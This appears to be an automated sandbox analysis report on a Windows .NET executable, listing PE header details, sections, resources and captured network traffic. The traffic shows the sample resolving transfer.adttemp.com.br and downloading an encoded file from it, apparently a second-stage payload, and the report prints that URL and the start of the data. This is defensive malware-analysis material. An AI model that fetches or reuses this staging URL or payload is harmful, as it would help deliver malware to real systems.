TLSH:	C9A3F80B36888705C4A876F484FB083643E67DD37A31C1867EF87E9959723A3DD8269D
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...dw................................... ... ....@.. ....................................`................................

File Icon


Icon Hash:	8f82989919951d01

Static PE Info

General

Entrypoint:	0x411ece
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xDDCD7764 [Tue Dec 2 19:03:00 2087 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x11e80	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x14000	0x8408	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1e000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x11e31	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xfed4	0x10000	81d9abae487737f3b8363a8b92a87f08	False	0.543731689453125	data	6.041145484562861	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.sdata	0x12000	0x1e8	0x200	3c39d870f65352347a925d22a100e2df	False	0.861328125	data	6.602276640036823	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x14000	0x8408	0x8600	225805ac598fde3e671ca2d9b49b6f7c	False	0.28407765858208955	data	5.191230299993546	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x1e000	0xc	0x200	8181352802a8db2ccc44ee1bdf6bebdf	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x141c0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	0.5487588652482269
RT_ICON	0x14628	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	0.37922138836772984
RT_ICON	0x156d0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	0.28060165975103735
RT_ICON	0x17c78	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	0.25614076523382145
RT_GROUP_ICON	0x1bea0	0x3e	data	0.7903225806451613
RT_VERSION	0x1bee0	0x33c	data	0.4251207729468599
RT_MANIFEST	0x1c21c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 25, 2024 11:41:05.483782053 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:05.483830929 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:05.483910084 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:05.493948936 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:05.493963003 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.099015951 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.099122047 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.103213072 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.103235006 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.103559971 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.154097080 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.178889036 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.223407030 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.291400909 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.291445017 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.291454077 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.291529894 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.291568041 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.309389114 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.309494019 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.309529066 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.357899904 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.378050089 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.378243923 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.378251076 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.378277063 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.378382921 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.378424883 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.378465891 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.380290985 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.380320072 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.380331993 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.380352974 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.380364895 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.380373001 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.380381107 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.380397081 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.380414963 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.380428076 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.380434990 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.396203995 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.396241903 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.396342993 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.396388054 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.396409035 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.450910091 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.465210915 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.465250015 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.465315104 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.465358019 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.465413094 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.465471983 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.465500116 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.465529919 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.465548992 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.466012955 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.466059923 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.466110945 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.466176033 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.466206074 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.466284990 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.467060089 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.467122078 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.467152119 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.467211962 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.467947960 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.468004942 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.468044996 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.468147039 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.468803883 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.468863010 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.468904018 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.468960047 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.483077049 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.483128071 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.483155966 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.483160973 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.483179092 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.483210087 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.483223915 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.551894903 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.552005053 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.552023888 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.552059889 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.552079916 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.552170992 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.552220106 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.552242041 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.552263975 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.552313089 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.552321911 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.552356005 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.552365065 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.552484035 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.552536011 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.552573919 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.552623987 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.552649975 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.552702904 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.553102016 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.553158998 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.553199053 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.553250074 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.553281069 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.553334951 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.554088116 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.554141998 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.554194927 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.554243088 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.554285049 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.554338932 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.554359913 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.554402113 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.554971933 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.555012941 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.555023909 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.555032015 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.555068016 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.555120945 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.555150986 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.555169106 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.555176973 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.555191994 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.555954933 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.555996895 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.556005001 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.556014061 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.556026936 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.556035995 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.556076050 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.556083918 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.556093931 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.556140900 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.556149006 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.556186914 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.569634914 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.569679022 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.569721937 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.569736004 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.569772005 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.569776058 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.569787025 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.569811106 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.569823980 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.569927931 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.569973946 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.569979906 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.569988966 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.570022106 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.639235020 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.639280081 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.639308929 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.639307022 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.639343023 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.639364004 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.639400959 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.639409065 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.639409065 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.639425993 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.639437914 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.639446974 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.639472961 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.639481068 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.639493942 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.639493942 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.639534950 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.639535904 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.639547110 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.639576912 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.639590025 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.639628887 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.639758110 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.639801025 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.639822006 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.639838934 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.639873028 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.640153885 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.640211105 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.640218019 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.640274048 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.640377998 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.640430927 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.640438080 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.640449047 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.640479088 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.640486956 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.640501022 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.640522003 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.640554905 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.640568018 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.640575886 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.640607119 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.641268015 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.641331911 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.641340971 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.641396999 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.641446114 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.641453028 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.641832113 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:06.641886950 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.659076929 CEST	49730	443	192.168.2.4	104.196.109.209
Sep 25, 2024 11:41:06.659111977 CEST	443	49730	104.196.109.209	192.168.2.4
Sep 25, 2024 11:41:18.783077002 CEST	49741	443	192.168.2.4	52.168.117.173
Sep 25, 2024 11:41:18.783181906 CEST	443	49741	52.168.117.173	192.168.2.4
Sep 25, 2024 11:41:18.783291101 CEST	49741	443	192.168.2.4	52.168.117.173
Sep 25, 2024 11:41:18.784311056 CEST	49741	443	192.168.2.4	52.168.117.173
Sep 25, 2024 11:41:18.784346104 CEST	443	49741	52.168.117.173	192.168.2.4
Sep 25, 2024 11:41:19.503210068 CEST	443	49741	52.168.117.173	192.168.2.4
Sep 25, 2024 11:41:19.503410101 CEST	49741	443	192.168.2.4	52.168.117.173
Sep 25, 2024 11:41:19.503432035 CEST	443	49741	52.168.117.173	192.168.2.4
Sep 25, 2024 11:41:19.503489971 CEST	49741	443	192.168.2.4	52.168.117.173
Sep 25, 2024 11:41:19.507728100 CEST	49741	443	192.168.2.4	52.168.117.173
Sep 25, 2024 11:41:19.507741928 CEST	443	49741	52.168.117.173	192.168.2.4
Sep 25, 2024 11:41:19.508127928 CEST	443	49741	52.168.117.173	192.168.2.4
Sep 25, 2024 11:41:19.549063921 CEST	49741	443	192.168.2.4	52.168.117.173
Sep 25, 2024 11:41:19.549849987 CEST	49741	443	192.168.2.4	52.168.117.173

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 25, 2024 11:41:05.180480003 CEST	57809	53	192.168.2.4	1.1.1.1
Sep 25, 2024 11:41:05.456423998 CEST	53	57809	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 25, 2024 11:41:05.180480003 CEST	192.168.2.4	1.1.1.1	0x2e75	Standard query (0)	transfer.adttemp.com.br	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 25, 2024 11:41:05.456423998 CEST	1.1.1.1	192.168.2.4	0x2e75	No error (0)	transfer.adttemp.com.br		104.196.109.209	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

transfer.adttemp.com.br

umwatson.events.data.microsoft.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	104.196.109.209	443	6812	C:\Users\user\Desktop\CCE_000110.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-25 09:41:06 UTC	94	OUT	GET /13Lxz9/kingggggme.txt HTTP/1.1 Host: transfer.adttemp.com.br Connection: Keep-Alive
2024-09-25 09:41:06 UTC	313	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 09:41:06 GMT Server: Transfer.sh HTTP Server 1.0 Content-Disposition: attachment; filename="kingggggme.txt" Content-Length: 327008 Content-Type: text/plain; charset=utf-8 X-Made-With: <3 by DutchCoders X-Served-By: Proudly served by DutchCoders Connection: close
2024-09-25 09:41:06 UTC	7687	IN	Data Raw: 66 4b 32 4e 61 51 78 48 56 59 5a 56 54 41 6f 2b 4e 65 4c 79 57 4e 6b 4c 67 47 45 66 74 62 47 65 73 48 52 63 61 77 39 41 46 64 57 72 67 35 48 6f 65 42 48 4b 79 4f 42 62 63 55 54 2b 65 71 7a 64 38 6e 76 6a 31 56 58 54 6b 33 6c 74 39 50 41 51 5a 44 7a 4d 73 65 52 31 44 69 44 65 75 43 47 77 69 69 57 57 53 50 48 41 73 55 54 32 50 79 79 35 77 7a 72 5a 36 46 5a 76 4f 59 6a 67 54 7a 53 30 4b 34 74 32 33 55 67 64 49 62 6e 50 38 6a 73 50 48 49 6c 6a 6c 6b 74 45 72 4e 5a 72 65 79 7a 5a 53 57 74 2f 2b 30 37 31 54 58 58 6f 6a 35 38 43 75 62 32 69 32 30 6f 51 77 51 71 69 6c 75 7a 57 2b 76 30 76 36 79 78 44 79 78 6d 6a 67 6b 37 37 34 64 78 43 74 2f 38 6f 41 57 67 6b 55 73 4d 31 2f 79 77 65 53 62 2b 67 47 69 61 52 34 6a 2f 77 5a 4c 33 58 74 61 41 4f 61 61 70 65 34 50 54 Data Ascii: fK2NaQxHVYZVTAo+NeLyWNkLgGEftbGesHRcaw9AFdWrg5HoeBHKyOBbcUT+eqzd8nvj1VXTk3lt9PAQZDzMseR1DiDeuCGwiiWWSPHAsUT2Pyy5wzrZ6FZvOYjgTzS0K4t23UgdIbnP8jsPHIljlktErNZreyzZSWt/+071TXXoj58Cub2i20oQwQqiluzW+v0v6yxDyxmjgk774dxCt/8oAWgkUsM1/yweSb+gGiaR4j/wZL3XtaAOaape4PT
